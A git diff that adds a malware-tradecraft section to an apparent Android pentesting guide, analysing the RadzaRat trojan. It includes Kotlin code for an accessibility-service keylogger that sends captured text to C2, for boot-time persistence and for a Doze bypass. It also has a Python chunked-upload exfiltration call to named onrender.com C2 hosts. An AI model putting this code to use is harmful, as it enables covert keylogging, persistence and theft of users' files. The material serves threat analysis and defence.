diff --git a/src/mobile-pentesting/android-app-pentesting/README.md b/src/mobile-pentesting/android-app-pentesting/README.md index 7e55967ef9f..3ec764e27fc 100644 --- a/src/mobile-pentesting/android-app-pentesting/README.md +++ b/src/mobile-pentesting/android-app-pentesting/README.md @@ -54,6 +54,76 @@ java -jar ../APKEditor.jar m -i splits/ -o merged.apk java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed ``` +## Android Malware Tradecraft: Accessibility, Persistence & C2 + +### Accessibility Service Abuse for Keylogging and UI Monitoring + +Recent Android RATs (e.g., RadzaRat) ship fake productivity apps that immediately prompt victims to enable a custom `AccessibilityService` (`MyAccessibilityService` declared with `BIND_ACCESSIBILITY_SERVICE`). Once granted, the service listens for `TYPE_VIEW_TEXT_CHANGED`, `TYPE_VIEW_TEXT_SELECTION_CHANGED`, and `TYPE_WINDOW_STATE_CHANGED`, letting operators keylog **any** app without root while capturing package names, view IDs, coordinates, and UI state. + +```kotlin +class SpyService: AccessibilityService() { + override fun onAccessibilityEvent(e: AccessibilityEvent) { + if (e.eventType == TYPE_VIEW_TEXT_CHANGED && e.text.isNotEmpty()) { + val log = mapOf("pkg" to e.packageName, "text" to e.text.joinToString(""), + "viewId" to (e.source?.viewIdResourceName ?: "")) + sendToC2("keylog", log) + } + } +} +``` + +Correlate the captured buffers with `TYPE_VIEW_FOCUSED` events to identify the active banking view before firing automated gestures. + +### Android Persistence via Boot Receivers, Foreground Services & Battery Optimization Bypass + +RadzaRat demonstrates that **no kernel exploit is required** to stay resident indefinitely: + +- `RECEIVE_BOOT_COMPLETED` + `RECEIVE_LOCKED_BOOT_COMPLETED` with a `BootReceiver` lets the malware start before the user unlocks the phone. +- The receiver immediately launches a foreground data-sync service registered with `FOREGROUND_SERVICE`, `FOREGROUND_SERVICE_DATA_SYNC`, or even `FOREGROUND_SERVICE_MEDIA_PROJECTION` so Android treats it as high priority. +- `REQUEST_IGNORE_BATTERY_OPTIMIZATIONS` combined with `WAKE_LOCK` keeps logging/exfil tasks alive even under Doze. +- A `DeviceAdminReceiver` (e.g., `MyDeviceAdminReceiver`) hardens removal: the RAT can prevent forced uninstalls or trigger lock/policy changes to re-prompt for credentials. + +```kotlin +class BootReceiver: BroadcastReceiver() { + override fun onReceive(ctx: Context, intent: Intent) { + if (intent.action in setOf(ACTION_BOOT_COMPLETED, ACTION_LOCKED_BOOT_COMPLETED)) { + ctx.startForegroundService(Intent(ctx, SyncService::class.java)) + } + } +} +``` + +```kotlin +fun requestDozeBypass(ctx: Context) { + val pm = ctx.getSystemService(PowerManager::class.java) + if (!pm.isIgnoringBatteryOptimizations(ctx.packageName)) { + val i = Intent(ACTION_REQUEST_IGNORE_BATTERY_OPTIMIZATIONS) + i.data = Uri.parse("package:${ctx.packageName}") + ctx.startActivity(i.addFlags(FLAG_ACTIVITY_NEW_TASK)) + } +} +``` + +The above combo plus `SYSTEM_ALERT_WINDOW` overlays ensures the RAT auto-recovers after reboots, resists termination, and can socially-engineer users into granting every dangerous permission again if Android ever revokes them. + +### Low-Cost C2 & Chunked Large-Volume Storage Exfiltration + +RadzaRat’s operator only needed a free [Render.com](https://render.com) web service and a Telegram bot to achieve full remote control: + +1. The APK abuses `MANAGE_EXTERNAL_STORAGE` to enumerate gigabytes of shared files through its `FileManagerActivity` facade. +2. Exfiltration is split into `/upload` (small objects) and `/upload_chunked` (multi-gig archives) HTTP endpoints hosted on Render (`telegram-bot-go-3hwv.onrender.com`, `telegram-bot-xftw.onrender.com`). +3. Each chunk POST includes metadata such as `device_id`, `path`, `chunk_index`, and `sha256`, allowing 10+ GB transfers without raising single-request alerts. +4. The backend forwards every chunk or keystroke to the operator via the Telegram Bot API (`sendDocument`, `sendMessage`), leveraging Telegram’s ubiquitous TLS traffic to blend in. + +```python +files = {"chunk": open(part, "rb")} +payload = {"device": d, "path": rel, "chunk_index": idx} +requests.post("https://telegram-bot-xftw.onrender.com/upload_chunked", + data=payload, files=files, timeout=30) +``` + +Stacking `BIND_ACCESSIBILITY_SERVICE`, `SYSTEM_ALERT_WINDOW`, Device Admin, `REQUEST_IGNORE_BATTERY_OPTIMIZATIONS`, and `MANAGE_EXTERNAL_STORAGE` keeps the sideloaded RAT resilient while its Telegram Bot API C2 blends into ubiquitous TLS traffic. + ## Case Studies & Vulnerabilities @@ -874,5 +944,6 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th - [smali-sslpin-patterns](https://github.com/aancw/smali-sslpin-patterns) - [Build a Repeatable Android Bug Bounty Lab: Emulator vs Magisk, Burp, Frida, and Medusa](https://www.yeswehack.com/learn-bug-bounty/android-lab-mobile-hacking-tools) - [CoRPhone — Android in-memory JNI execution and packaging pipeline](https://github.com/0xdevil/corphone) +- [RadzaRat: New Android Trojan Disguised as File Manager Emerges with Zero Detection Rate](https://www.certosoftware.com/insights/radzarat-new-android-trojan-disguised-as-file-manager-emerges-with-zero-detection-rate/) {{#include ../../banners/hacktricks-training.md}} \ No newline at end of file